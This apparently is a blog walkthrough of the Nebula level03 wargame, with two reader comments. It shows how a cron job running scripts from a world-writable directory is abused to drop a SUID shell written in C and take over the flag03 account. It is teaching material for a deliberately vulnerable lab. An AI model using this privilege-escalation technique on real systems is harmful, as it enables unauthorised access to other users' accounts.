Wednesday, August 8, 2012

nebula level03

According to the level details in http://exploit-exercises.com/nebula/level03 there is a crontab called every couple of minutes (for/as user flag03). Let's check flag03's home directory: 
level03@nebula:~$ ls -l /home/flag03
total 8
drwxrwxrwx 2 flag03 flag03 4096 2012-08-08 00:21 writable.d
-rwxr-xr-x 1 flag03 flag03   98 2011-11-20 21:22 writable.sh
writable.d seems to be world-writable (everyone can write to it, just like /tmp).
writable.sh must be the script called by cron. Let's see what it does: 
level03@nebula:~$ cat /home/flag03/writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done
Apparently writable.sh executes every executable file residing in writable.d with a 5 second cpu time limit, and then deletes it. We can't do a lot ourselves with a 5 second time limit. We want a shell. So our strategy will be the following:
Make a script to be called by writable.sh (which is itself called by cron and executed as user flag03) which will drop a SUID shell for us in tmp. Then we'll be free to use the shell in /tmp whenever we need it, for as long as we want.

The shell

For the shell we'll just make a simple C program which calls setresuid and then executes bash:
level03@nebula:~$ cat > /tmp/level03_sh.c
#include <unistd.h>
#include <stdlib.h>

int main()
{
    int euid = geteuid();
    setresuid(euid, euid, euid);
    system("/bin/sh");
    return 0;
}
level03@nebula:~$ make /tmp/level03_sh
cc     /tmp/level03_sh.c   -o /tmp/level03_sh

The script

First we make the script which will drop our shell and put it in writable.d:
level03@nebula:~$ cat > /home/flag03/writable.d/execme
#!/bin/sh
cp /tmp/level03_sh /tmp/flag03_sh
chmod +s /tmp/flag03_sh
level03@nebula:~$ chmod +x /home/flag03/writable.d/execme
Then we wait for it to be called: 
level03@nebula:~$ chmod +x /home/flag03/writable.d/execme
level03@nebula:~$ sleep 180; /tmp/flag03_sh
sh-4.2$ id
uid=996(flag03) gid=1004(level03) groups=996(flag03),1004(level03)
In no longer than 3 minutes we have a shell. Now get that flag :D 
sh-4.2$ getflag
You have successfully executed getflag on a target account

~ Dmitry
Posted by at
Labels: , , , , , , ,

2 comments:

  1. Treasure HunterMarch 24, 2013 at 4:04 AM

    dmitry не могу получить шел описанным способо. суидник полученный из крона по какой-то причине whoami = level03 хотя он -perm -4000 и +x
    сравнил с предыдушими уровнями, там везде у суидника была группа дефолтного юзера (level0x) а тут получается суидник flag03:flag03 мб в этом и трабл?

    ReplyDelete
  2. jpsNovember 18, 2013 at 11:25 AM

    hm... i receive a permission denied trying to use make

    ReplyDelete

Subscribe to: Post Comments (Atom)